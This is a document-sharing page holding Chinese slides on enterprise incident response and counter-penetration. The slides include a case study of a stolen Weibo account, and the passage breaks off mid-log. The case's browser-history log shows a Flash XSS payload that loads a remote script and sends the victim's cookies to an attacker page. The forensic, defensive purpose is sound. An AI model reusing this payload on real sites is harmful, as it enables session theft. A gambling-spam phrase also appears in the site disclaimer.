- 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
企业应急响应以及反渗透
“企业应急响应以及反渗透” 之真实案例分析 关于我 • piaca • 乌云⽩帽⼦ • 前新浪安全架构师 • Insight Labs 成员 • ⼋年安全从业经验 • 应急响应介绍 • ⼀些案例 • 总结 什么是应急响应? 被“⿊”了 • 被⼊侵 • 被蠕⾍ • 被钓⻥ • 被 DDoS • 被劫持 • …… 为什么做应急响应? 被逼的 为什么做应急响应? • 保障业务 • 还原攻击 • 明确意图 • 解决⽅案 • 查漏补缺 • 司法途径 怎么做应急响应? 怎么做应急响应? • 确定攻击时间 • 查找攻击线索 • 梳理攻击流程 • 实施解决⽅案 • 定位攻击⼈,取证 为什么做反渗透? 为什么反渗透? • 被动变主动 • 攻击者都在做什么 • 确认攻击者是谁 • 取证 案例之官微帐号被盗 分析原因 • ⾮⼯作⼈员操作 • 帐号有被 cookie 登录 • 可是 cookie 有 httponly ================================================== URL : /zWI1bUQ Last Visit Date : 2012-7-16 19:22:27 ================================================== ================================================== URL : 42/index.php Last Visit Date : 2012-7-16 19:22:28 Referrer : /zWI1bUQ ================================================== ================================================== URL : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=42/e.js %3E%3C/script%3E%22%27}) Last Visit Date : 2012-7-16 19:22:28 Referrer : 42/index.php Title : player.swf (application/x-shockwave-flash 对象) ================================================== ================================================== URL : 42/e.php?opener=0cookie=ULV %3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma %3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3D%7Cutmccn %3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/bre
文档评论(0)